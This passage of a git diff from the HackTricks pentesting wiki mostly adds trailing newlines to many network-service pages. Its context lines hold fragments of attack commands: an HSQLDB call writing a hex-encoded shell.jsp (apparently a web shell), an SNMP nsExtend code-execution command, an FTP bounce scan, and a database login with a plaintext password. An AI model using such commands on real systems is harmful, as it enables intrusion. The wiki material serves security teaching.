../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/6000-pentesting-x11.md b/src/network-services-pentesting/6000-pentesting-x11.md index 7e0ca92da..d63329ed9 100644 --- a/src/network-services-pentesting/6000-pentesting-x11.md +++ b/src/network-services-pentesting/6000-pentesting-x11.md @@ -163,3 +163,4 @@ Then, put your IP address and port in the **R-Shell** option and click on **R-sh {{#include ../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/623-udp-ipmi.md b/src/network-services-pentesting/623-udp-ipmi.md index b2b9e7bca..602fdd83a 100644 --- a/src/network-services-pentesting/623-udp-ipmi.md +++ b/src/network-services-pentesting/623-udp-ipmi.md @@ -141,3 +141,4 @@ ID Name Callin Link Auth IPMI Msg Channel Priv Limit {{#include ../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/6379-pentesting-redis.md b/src/network-services-pentesting/6379-pentesting-redis.md index c1dff6378..08b2432c9 100644 --- a/src/network-services-pentesting/6379-pentesting-redis.md +++ b/src/network-services-pentesting/6379-pentesting-redis.md @@ -307,3 +307,4 @@ _For some reason (as for the author of_ [_https://liveoverflow.com/gitlab-11-4-7 {{#include ../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/69-udp-tftp.md b/src/network-services-pentesting/69-udp-tftp.md index 2b97a8897..cc212a27a 100644 --- a/src/network-services-pentesting/69-udp-tftp.md +++ b/src/network-services-pentesting/69-udp-tftp.md @@ -45,3 +45,4 @@ client.upload("filename to upload", "/local/path/file", timeout=5) {{#include ../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/7-tcp-udp-pentesting-echo.md b/src/network-services-pentesting/7-tcp-udp-pentesting-echo.md index 16aac3cee..a652d2f86 100644 --- a/src/network-services-pentesting/7-tcp-udp-pentesting-echo.md +++ b/src/network-services-pentesting/7-tcp-udp-pentesting-echo.md @@ -35,3 +35,4 @@ Hello echo #This is the response {{#include ../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/700-pentesting-epp.md b/src/network-services-pentesting/700-pentesting-epp.md index 53507da2e..51e4496b7 100644 --- a/src/network-services-pentesting/700-pentesting-epp.md +++ b/src/network-services-pentesting/700-pentesting-epp.md @@ -15,3 +15,4 @@ Basically, it's one of the protocols a **TLD registrar is going to be offering t {{#include ../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/8009-pentesting-apache-jserv-protocol-ajp.md b/src/network-services-pentesting/8009-pentesting-apache-jserv-protocol-ajp.md index 46603b87c..2d664cc99 100644 --- a/src/network-services-pentesting/8009-pentesting-apache-jserv-protocol-ajp.md +++ b/src/network-services-pentesting/8009-pentesting-apache-jserv-protocol-ajp.md @@ -99,3 +99,4 @@ It's also possible to use an **Apache AJP proxy** to access that port instead of {{#include ../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/8086-pentesting-influxdb.md b/src/network-services-pentesting/8086-pentesting-influxdb.md index b8c94d034..3e5d3b818 100644 --- a/src/network-services-pentesting/8086-pentesting-influxdb.md +++ b/src/network-services-pentesting/8086-pentesting-influxdb.md @@ -119,4 +119,4 @@ time cpu host usage_guest usage_guest_nice usage_idle msf6 > use auxiliary/scanner/http/influxdb_enum ``` -{{#include ../banners/hacktricks-training.md}} \ No newline at end of file +{{#include ../banners/hacktricks-training.md}} diff --git a/src/network-services-pentesting/8089-splunkd.md b/src/network-services-pentesting/8089-splunkd.md index 844bcfbc8..b7ed90d7f 100644 --- a/src/network-services-pentesting/8089-splunkd.md +++ b/src/network-services-pentesting/8089-splunkd.md @@ -124,3 +124,4 @@ In the following page you can find an explanation how this service can be abused {{#include ../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/8333-18333-38333-18444-pentesting-bitcoin.md b/src/network-services-pentesting/8333-18333-38333-18444-pentesting-bitcoin.md index 35bc5f7a4..d64c8abc4 100644 --- a/src/network-services-pentesting/8333-18333-38333-18444-pentesting-bitcoin.md +++ b/src/network-services-pentesting/8333-18333-38333-18444-pentesting-bitcoin.md @@ -51,3 +51,4 @@ PORT STATE SERVICE {{#include ../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/873-pentesting-rsync.md b/src/network-services-pentesting/873-pentesting-rsync.md index 86a6f22d4..5774606d2 100644 --- a/src/network-services-pentesting/873-pentesting-rsync.md +++ b/src/network-services-pentesting/873-pentesting-rsync.md @@ -101,3 +101,4 @@ Within this file, a _secrets file_ parameter might point to a file containing ** {{#include ../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/9000-pentesting-fastcgi.md b/src/network-services-pentesting/9000-pentesting-fastcgi.md index d8b7d9e94..64ddebc5f 100644 --- a/src/network-services-pentesting/9000-pentesting-fastcgi.md +++ b/src/network-services-pentesting/9000-pentesting-fastcgi.md @@ -39,3 +39,4 @@ or you can also use the following python script: [https://gist.github.com/phith0 {{#include ../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/9001-pentesting-hsqldb.md b/src/network-services-pentesting/9001-pentesting-hsqldb.md index 68875cc0f..d80671618 100644 --- a/src/network-services-pentesting/9001-pentesting-hsqldb.md +++ b/src/network-services-pentesting/9001-pentesting-hsqldb.md @@ -81,3 +81,4 @@ call writetofile('/path/ROOT/shell.jsp', cast ('3c2540207061676520696d706f72743d {{#include ../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/9100-pjl.md b/src/network-services-pentesting/9100-pjl.md index f73962716..ddbb65ea2 100644 --- a/src/network-services-pentesting/9100-pjl.md +++ b/src/network-services-pentesting/9100-pjl.md @@ -63,3 +63,4 @@ This is the tool you want to use to abuse printers: {{#include ../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/9200-pentesting-elasticsearch.md b/src/network-services-pentesting/9200-pentesting-elasticsearch.md index cc5bf2779..fbaf650d7 100644 --- a/src/network-services-pentesting/9200-pentesting-elasticsearch.md +++ b/src/network-services-pentesting/9200-pentesting-elasticsearch.md @@ -186,3 +186,4 @@ msf > use auxiliary/scanner/elasticsearch/indices_enum {{#include ../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/cassandra.md b/src/network-services-pentesting/cassandra.md index bc4dae4d6..d7bb7e9b3 100644 --- a/src/network-services-pentesting/cassandra.md +++ b/src/network-services-pentesting/cassandra.md @@ -53,3 +53,4 @@ nmap -sV --script cassandra-info -p {{#include ../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/ipsec-ike-vpn-pentesting.md b/src/network-services-pentesting/ipsec-ike-vpn-pentesting.md index e8591fe89..1b31eb61f 100644 --- a/src/network-services-pentesting/ipsec-ike-vpn-pentesting.md +++ b/src/network-services-pentesting/ipsec-ike-vpn-pentesting.md @@ -271,3 +271,4 @@ Ensure that actual, secure values are used to replace the placeholders when conf {{#include ../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/nfs-service-pentesting.md b/src/network-services-pentesting/nfs-service-pentesting.md index 752f5db33..44c80d930 100644 --- a/src/network-services-pentesting/nfs-service-pentesting.md +++ b/src/network-services-pentesting/nfs-service-pentesting.md @@ -130,3 +130,4 @@ Entry_2: {{#include ../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-264-check-point-firewall-1.md b/src/network-services-pentesting/pentesting-264-check-point-firewall-1.md index 122562f42..bb4312b95 100644 --- a/src/network-services-pentesting/pentesting-264-check-point-firewall-1.md +++ b/src/network-services-pentesting/pentesting-264-check-point-firewall-1.md @@ -43,3 +43,4 @@ CN=Panama,O=MGMTT.srv.rxfrmi {{#include ../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-631-internet-printing-protocol-ipp.md b/src/network-services-pentesting/pentesting-631-internet-printing-protocol-ipp.md index 27461163e..fcd2c7907 100644 --- a/src/network-services-pentesting/pentesting-631-internet-printing-protocol-ipp.md +++ b/src/network-services-pentesting/pentesting-631-internet-printing-protocol-ipp.md @@ -25,3 +25,4 @@ If you want to learn more about [**hacking printers read this page**](http://hac {{#include ../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-compaq-hp-insight-manager.md b/src/network-services-pentesting/pentesting-compaq-hp-insight-manager.md index fdafb885a..4a36b9352 100644 --- a/src/network-services-pentesting/pentesting-compaq-hp-insight-manager.md +++ b/src/network-services-pentesting/pentesting-compaq-hp-insight-manager.md @@ -21,3 +21,4 @@ jboss-service.xml {{#include ../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-dns.md b/src/network-services-pentesting/pentesting-dns.md index 02a338716..3d3b06e2d 100644 --- a/src/network-services-pentesting/pentesting-dns.md +++ b/src/network-services-pentesting/pentesting-dns.md @@ -267,3 +267,4 @@ Entry_6: {{#include ../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-finger.md b/src/network-services-pentesting/pentesting-finger.md index ed18916cd..de2f5f351 100644 --- a/src/network-services-pentesting/pentesting-finger.md +++ b/src/network-services-pentesting/pentesting-finger.md @@ -71,3 +71,4 @@ finger @internal@external {{#include ../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-ftp/README.md b/src/network-services-pentesting/pentesting-ftp/README.md index dc2f07fb6..7e0f721ed 100644 --- a/src/network-services-pentesting/pentesting-ftp/README.md +++ b/src/network-services-pentesting/pentesting-ftp/README.md @@ -282,3 +282,4 @@ Entry_7: {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-ftp/ftp-bounce-attack.md b/src/network-services-pentesting/pentesting-ftp/ftp-bounce-attack.md index 521ff48c8..adacaa817 100644 --- a/src/network-services-pentesting/pentesting-ftp/ftp-bounce-attack.md +++ b/src/network-services-pentesting/pentesting-ftp/ftp-bounce-attack.md @@ -38,3 +38,4 @@ nmap -v -p 21,22,445,80,443 -b ftp:ftp@10.2.1.5 192.168.0.1/24 #Scan the interna {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-ftp/ftp-bounce-download-2oftp-file.md b/src/network-services-pentesting/pentesting-ftp/ftp-bounce-download-2oftp-file.md index f7016dea0..3c7f7189d 100644 --- a/src/network-services-pentesting/pentesting-ftp/ftp-bounce-download-2oftp-file.md +++ b/src/network-services-pentesting/pentesting-ftp/ftp-bounce-download-2oftp-file.md @@ -28,3 +28,4 @@ For a more detailed information check the post: [http://www.ouah.org/ftpbounce.h {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-imap.md b/src/network-services-pentesting/pentesting-imap.md index c074bf496..76287cbf1 100644 --- a/src/network-services-pentesting/pentesting-imap.md +++ b/src/network-services-pentesting/pentesting-imap.md @@ -195,3 +195,4 @@ Entry_4: {{#include ../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-irc.md b/src/network-services-pentesting/pentesting-irc.md index eb79be27c..5b7552926 100644 --- a/src/network-services-pentesting/pentesting-irc.md +++ b/src/network-services-pentesting/pentesting-irc.md @@ -84,3 +84,4 @@ nmap -sV --script irc-botnet-channels,irc-info,irc-unrealircd-backdoor -p 194,66 {{#include ../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-jdwp-java-debug-wire-protocol.md b/src/network-services-pentesting/pentesting-jdwp-java-debug-wire-protocol.md index f84927aaf..dba1d4031 100644 --- a/src/network-services-pentesting/pentesting-jdwp-java-debug-wire-protocol.md +++ b/src/network-services-pentesting/pentesting-jdwp-java-debug-wire-protocol.md @@ -69,3 +69,4 @@ I found that the use of `--break-on 'java.lang.String.indexOf'` makes the exploi {{#include ../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-kerberos-88/README.md b/src/network-services-pentesting/pentesting-kerberos-88/README.md index fe313311b..9f396aa6b 100644 --- a/src/network-services-pentesting/pentesting-kerberos-88/README.md +++ b/src/network-services-pentesting/pentesting-kerberos-88/README.md @@ -68,3 +68,4 @@ Entry_4: {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-kerberos-88/harvesting-tickets-from-linux.md b/src/network-services-pentesting/pentesting-kerberos-88/harvesting-tickets-from-linux.md index 0c50e2701..713d58137 100644 --- a/src/network-services-pentesting/pentesting-kerberos-88/harvesting-tickets-from-linux.md +++ b/src/network-services-pentesting/pentesting-kerberos-88/harvesting-tickets-from-linux.md @@ -23,3 +23,4 @@ Building on the principles of the **hercules.sh script**, the [**tickey**](https {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-kerberos-88/harvesting-tickets-from-windows.md b/src/network-services-pentesting/pentesting-kerberos-88/harvesting-tickets-from-windows.md index da0710f80..e173d4d71 100644 --- a/src/network-services-pentesting/pentesting-kerberos-88/harvesting-tickets-from-windows.md +++ b/src/network-services-pentesting/pentesting-kerberos-88/harvesting-tickets-from-windows.md @@ -45,3 +45,4 @@ When using these commands, ensure to replace placeholders like `` {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-ldap.md b/src/network-services-pentesting/pentesting-ldap.md index 081ee1297..001144b6a 100644 --- a/src/network-services-pentesting/pentesting-ldap.md +++ b/src/network-services-pentesting/pentesting-ldap.md @@ -427,3 +427,4 @@ Entry_6: {{#include ../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-modbus.md b/src/network-services-pentesting/pentesting-modbus.md index 340e58e63..5beadffb1 100644 --- a/src/network-services-pentesting/pentesting-modbus.md +++ b/src/network-services-pentesting/pentesting-modbus.md @@ -23,3 +23,4 @@ msf> use auxiliary/scanner/scada/modbus_findunitid {{#include ../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md b/src/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md index c1e3cf106..2c5e863f6 100644 --- a/src/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md +++ b/src/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md @@ -691,3 +691,4 @@ Entry_3: {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-mssql-microsoft-sql-server/types-of-mssql-users.md b/src/network-services-pentesting/pentesting-mssql-microsoft-sql-server/types-of-mssql-users.md index d46f9254c..fff9ee227 100644 --- a/src/network-services-pentesting/pentesting-mssql-microsoft-sql-server/types-of-mssql-users.md +++ b/src/network-services-pentesting/pentesting-mssql-microsoft-sql-server/types-of-mssql-users.md @@ -25,3 +25,4 @@ Table taken from the [**docs**](https://learn.microsoft.com/en-us/sql/relational {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-mysql.md b/src/network-services-pentesting/pentesting-mysql.md index d15aeb2da..cc8193ae3 100644 --- a/src/network-services-pentesting/pentesting-mysql.md +++ b/src/network-services-pentesting/pentesting-mysql.md @@ -648,3 +648,4 @@ Entry_4: {{#include ../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-ntp.md b/src/network-services-pentesting/pentesting-ntp.md index fbd9eddfb..02764d893 100644 --- a/src/network-services-pentesting/pentesting-ntp.md +++ b/src/network-services-pentesting/pentesting-ntp.md @@ -84,3 +84,4 @@ Entry_2: {{#include ../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-pop.md b/src/network-services-pentesting/pentesting-pop.md index c3f140f03..58d67f223 100644 --- a/src/network-services-pentesting/pentesting-pop.md +++ b/src/network-services-pentesting/pentesting-pop.md @@ -131,3 +131,4 @@ Entry_6: {{#include ../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-postgresql.md b/src/network-services-pentesting/pentesting-postgresql.md index dc7c6dbea..782d57565 100644 --- a/src/network-services-pentesting/pentesting-postgresql.md +++ b/src/network-services-pentesting/pentesting-postgresql.md @@ -807,3 +807,4 @@ The available password-based authentication methods in pg_hba.conf are **md5**, + diff --git a/src/network-services-pentesting/pentesting-rdp.md b/src/network-services-pentesting/pentesting-rdp.md index 169cc42ae..afb6cdded 100644 --- a/src/network-services-pentesting/pentesting-rdp.md +++ b/src/network-services-pentesting/pentesting-rdp.md @@ -148,3 +148,4 @@ Entry_2: {{#include ../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-remote-gdbserver.md b/src/network-services-pentesting/pentesting-remote-gdbserver.md index 7552dde2a..65c5935d2 100644 --- a/src/network-services-pentesting/pentesting-remote-gdbserver.md +++ b/src/network-services-pentesting/pentesting-remote-gdbserver.md @@ -184,3 +184,4 @@ RemoteCmd() {{#include ../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-rlogin.md b/src/network-services-pentesting/pentesting-rlogin.md index 0cc181b9b..1a46d69b4 100644 --- a/src/network-services-pentesting/pentesting-rlogin.md +++ b/src/network-services-pentesting/pentesting-rlogin.md @@ -39,3 +39,4 @@ find / -name .rhosts {{#include ../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-rpcbind.md b/src/network-services-pentesting/pentesting-rpcbind.md index 94598fc79..cb02d5574 100644 --- a/src/network-services-pentesting/pentesting-rpcbind.md +++ b/src/network-services-pentesting/pentesting-rpcbind.md @@ -115,3 +115,4 @@ Entry_3: {{#include ../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-rsh.md b/src/network-services-pentesting/pentesting-rsh.md index c0bd4a43d..5d242f218 100644 --- a/src/network-services-pentesting/pentesting-rsh.md +++ b/src/network-services-pentesting/pentesting-rsh.md @@ -28,3 +28,4 @@ rsh domain\\user@ {{#include ../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-sap.md b/src/network-services-pentesting/pentesting-sap.md index 3cd3c2075..84f4d943f 100644 --- a/src/network-services-pentesting/pentesting-sap.md +++ b/src/network-services-pentesting/pentesting-sap.md @@ -387,3 +387,4 @@ bizploit> start {{#include ../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-smb.md b/src/network-services-pentesting/pentesting-smb.md index b77b9a063..7656937ad 100644 --- a/src/network-services-pentesting/pentesting-smb.md +++ b/src/network-services-pentesting/pentesting-smb.md @@ -592,3 +592,4 @@ Entry_6: {{#include ../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-smb/README.md b/src/network-services-pentesting/pentesting-smb/README.md index 8de9f08b7..29382269a 100644 --- a/src/network-services-pentesting/pentesting-smb/README.md +++ b/src/network-services-pentesting/pentesting-smb/README.md @@ -592,3 +592,4 @@ Entry_6: {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-smb/rpcclient-enumeration.md b/src/network-services-pentesting/pentesting-smb/rpcclient-enumeration.md index 40a4dac95..dc3fda01f 100644 --- a/src/network-services-pentesting/pentesting-smb/rpcclient-enumeration.md +++ b/src/network-services-pentesting/pentesting-smb/rpcclient-enumeration.md @@ -89,3 +89,4 @@ To **understand** better how the tools _**samrdump**_ **and** _**rpcdump**_ work {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-smtp/README.md b/src/network-services-pentesting/pentesting-smtp/README.md index 106c1dd92..2ebf994af 100644 --- a/src/network-services-pentesting/pentesting-smtp/README.md +++ b/src/network-services-pentesting/pentesting-smtp/README.md @@ -607,3 +607,4 @@ Entry_8: {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-smtp/smtp-commands.md b/src/network-services-pentesting/pentesting-smtp/smtp-commands.md index ad03655e0..d76dec8a0 100644 --- a/src/network-services-pentesting/pentesting-smtp/smtp-commands.md +++ b/src/network-services-pentesting/pentesting-smtp/smtp-commands.md @@ -48,3 +48,4 @@ It terminates the SMTP conversation. {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-smtp/smtp-smuggling.md b/src/network-services-pentesting/pentesting-smtp/smtp-smuggling.md index d4a2f4740..01044b2a1 100644 --- a/src/network-services-pentesting/pentesting-smtp/smtp-smuggling.md +++ b/src/network-services-pentesting/pentesting-smtp/smtp-smuggling.md @@ -35,3 +35,4 @@ Also note that the SPF is bypassed because if you smuggle an email from `admin@o {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-snmp/README.md b/src/network-services-pentesting/pentesting-snmp/README.md index 9799a9a8e..8cc41a64e 100644 --- a/src/network-services-pentesting/pentesting-snmp/README.md +++ b/src/network-services-pentesting/pentesting-snmp/README.md @@ -284,3 +284,4 @@ Entry_5: {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-snmp/cisco-snmp.md b/src/network-services-pentesting/pentesting-snmp/cisco-snmp.md index 3bec8802a..510fbcec1 100644 --- a/src/network-services-pentesting/pentesting-snmp/cisco-snmp.md +++ b/src/network-services-pentesting/pentesting-snmp/cisco-snmp.md @@ -42,3 +42,4 @@ msf6 auxiliary(scanner/snmp/snmp_enum) > exploit {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-snmp/snmp-rce.md b/src/network-services-pentesting/pentesting-snmp/snmp-rce.md index 2a61dbf29..2af97c5cc 100644 --- a/src/network-services-pentesting/pentesting-snmp/snmp-rce.md +++ b/src/network-services-pentesting/pentesting-snmp/snmp-rce.md @@ -56,3 +56,4 @@ snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c SuP3RPrivCom90 10.129.2.26 'nsExtendSta {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-ssh.md b/src/network-services-pentesting/pentesting-ssh.md index 0eb044ab0..6430b522b 100644 --- a/src/network-services-pentesting/pentesting-ssh.md +++ b/src/network-services-pentesting/pentesting-ssh.md @@ -343,3 +343,4 @@ Entry_2: {{#include ../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-telnet.md b/src/network-services-pentesting/pentesting-telnet.md index 3116c3a41..82cf4831e 100644 --- a/src/network-services-pentesting/pentesting-telnet.md +++ b/src/network-services-pentesting/pentesting-telnet.md @@ -81,3 +81,4 @@ Entry_4: {{#include ../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-vnc.md b/src/network-services-pentesting/pentesting-vnc.md index bff609c42..8f67ed44c 100644 --- a/src/network-services-pentesting/pentesting-vnc.md +++ b/src/network-services-pentesting/pentesting-vnc.md @@ -54,3 +54,4 @@ I save the tool here also for ease of access: {{#include ../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-voip/README.md b/src/network-services-pentesting/pentesting-voip/README.md index 21ea75e1a..70ee0c8e3 100644 --- a/src/network-services-pentesting/pentesting-voip/README.md +++ b/src/network-services-pentesting/pentesting-voip/README.md @@ -698,3 +698,4 @@ The easiest way to install a software such as Asterisk is to download an **OS di {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-voip/basic-voip-protocols/README.md b/src/network-services-pentesting/pentesting-voip/basic-voip-protocols/README.md index f03e19482..274880d22 100644 --- a/src/network-services-pentesting/pentesting-voip/basic-voip-protocols/README.md +++ b/src/network-services-pentesting/pentesting-voip/basic-voip-protocols/README.md @@ -97,3 +97,4 @@ These protocols play essential roles in **delivering and securing real-time mult {{#include ../../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-voip/basic-voip-protocols/sip-session-initiation-protocol.md b/src/network-services-pentesting/pentesting-voip/basic-voip-protocols/sip-session-initiation-protocol.md index 86588eb60..d1710c657 100644 --- a/src/network-services-pentesting/pentesting-voip/basic-voip-protocols/sip-session-initiation-protocol.md +++ b/src/network-services-pentesting/pentesting-voip/basic-voip-protocols/sip-session-initiation-protocol.md @@ -243,3 +243,4 @@ After the registrar server verifies the provided credentials, **it sends a "200 {{#include ../../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-web/403-and-401-bypasses.md b/src/network-services-pentesting/pentesting-web/403-and-401-bypasses.md index ee82a2a15..03a5dc8db 100644 --- a/src/network-services-pentesting/pentesting-web/403-and-401-bypasses.md +++ b/src/network-services-pentesting/pentesting-web/403-and-401-bypasses.md @@ -120,3 +120,4 @@ guest guest {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-web/README.md b/src/network-services-pentesting/pentesting-web/README.md index becd6be82..84938d74d 100644 --- a/src/network-services-pentesting/pentesting-web/README.md +++ b/src/network-services-pentesting/pentesting-web/README.md @@ -423,3 +423,4 @@ Entry_12: {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-web/aem-adobe-experience-cloud.md b/src/network-services-pentesting/pentesting-web/aem-adobe-experience-cloud.md index 003b6f6e2..9f62440af 100644 --- a/src/network-services-pentesting/pentesting-web/aem-adobe-experience-cloud.md +++ b/src/network-services-pentesting/pentesting-web/aem-adobe-experience-cloud.md @@ -5,3 +5,4 @@ Find vulnerabilities and missconfigurations with [https://github.com/0ang3el/aem {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-web/angular.md b/src/network-services-pentesting/pentesting-web/angular.md index 945432bbe..f1b1a7c22 100644 --- a/src/network-services-pentesting/pentesting-web/angular.md +++ b/src/network-services-pentesting/pentesting-web/angular.md @@ -614,3 +614,4 @@ According to the W3C documentation, the `window.location` and `document.location + diff --git a/src/network-services-pentesting/pentesting-web/apache.md b/src/network-services-pentesting/pentesting-web/apache.md index 760cbf8c0..197d80d01 100644 --- a/src/network-services-pentesting/pentesting-web/apache.md +++ b/src/network-services-pentesting/pentesting-web/apache.md @@ -278,3 +278,4 @@ Check [**Docker PHP LFI Summary**](https://www.leavesongs.com/PENETRATION/docker {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-web/artifactory-hacking-guide.md b/src/network-services-pentesting/pentesting-web/artifactory-hacking-guide.md index faa3f5a0e..f288873e3 100644 --- a/src/network-services-pentesting/pentesting-web/artifactory-hacking-guide.md +++ b/src/network-services-pentesting/pentesting-web/artifactory-hacking-guide.md @@ -5,3 +5,4 @@ {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-web/bolt-cms.md b/src/network-services-pentesting/pentesting-web/bolt-cms.md index 531ce9094..0adbd7c81 100644 --- a/src/network-services-pentesting/pentesting-web/bolt-cms.md +++ b/src/network-services-pentesting/pentesting-web/bolt-cms.md @@ -25,3 +25,4 @@ After login as admin (go to /bot lo access the login prompt), you can get RCE in {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-web/buckets/README.md b/src/network-services-pentesting/pentesting-web/buckets/README.md index 1445468a4..02a21b5e7 100644 --- a/src/network-services-pentesting/pentesting-web/buckets/README.md +++ b/src/network-services-pentesting/pentesting-web/buckets/README.md @@ -9,3 +9,4 @@ Check this page if you want to learn more about enumerating and abusing Buckets: {{#include ../../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-web/buckets/firebase-database.md b/src/network-services-pentesting/pentesting-web/buckets/firebase-database.md index 039088149..914b893a3 100644 --- a/src/network-services-pentesting/pentesting-web/buckets/firebase-database.md +++ b/src/network-services-pentesting/pentesting-web/buckets/firebase-database.md @@ -13,3 +13,4 @@ Learn more about Firebase in: {{#include ../../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-web/cgi.md b/src/network-services-pentesting/pentesting-web/cgi.md index bc8970487..49ea51881 100644 --- a/src/network-services-pentesting/pentesting-web/cgi.md +++ b/src/network-services-pentesting/pentesting-web/cgi.md @@ -82,3 +82,4 @@ curl -i --data-binary "" "http://jh2i.com:500 {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-web/code-review-tools.md b/src/network-services-pentesting/pentesting-web/code-review-tools.md index c4567022c..fe41da3ec 100644 --- a/src/network-services-pentesting/pentesting-web/code-review-tools.md +++ b/src/network-services-pentesting/pentesting-web/code-review-tools.md @@ -458,3 +458,4 @@ https://github.com/securego/gosec {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-web/django.md b/src/network-services-pentesting/pentesting-web/django.md index 7034b5477..9c03cdd58 100644 --- a/src/network-services-pentesting/pentesting-web/django.md +++ b/src/network-services-pentesting/pentesting-web/django.md @@ -9,3 +9,4 @@ This HackerOne report provides a great, reproducible example of exploiting Djang + diff --git a/src/network-services-pentesting/pentesting-web/dotnetnuke-dnn.md b/src/network-services-pentesting/pentesting-web/dotnetnuke-dnn.md index 5af0303ed..696480748 100644 --- a/src/network-services-pentesting/pentesting-web/dotnetnuke-dnn.md +++ b/src/network-services-pentesting/pentesting-web/dotnetnuke-dnn.md @@ -44,3 +44,4 @@ You can **escalate privileges** using the **Potatoes** or **PrintSpoofer** for e {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-web/drupal/README.md b/src/network-services-pentesting/pentesting-web/drupal/README.md index 20beb62fc..061d8e5a9 100644 --- a/src/network-services-pentesting/pentesting-web/drupal/README.md +++ b/src/network-services-pentesting/pentesting-web/drupal/README.md @@ -100,3 +100,4 @@ mysql -u drupaluser --password='2r9u8hu23t532erew' -e 'use drupal; select * from {{#include ../../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-web/drupal/drupal-rce.md b/src/network-services-pentesting/pentesting-web/drupal/drupal-rce.md index cd55644a0..0b7b82e83 100644 --- a/src/network-services-pentesting/pentesting-web/drupal/drupal-rce.md +++ b/src/network-services-pentesting/pentesting-web/drupal/drupal-rce.md @@ -243,3 +243,4 @@ Thank you for taking the time to read this article, I hope it will help you get {{#include ../../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-web/electron-desktop-apps/README.md b/src/network-services-pentesting/pentesting-web/electron-desktop-apps/README.md index 16e28e491..58bbbb958 100644 --- 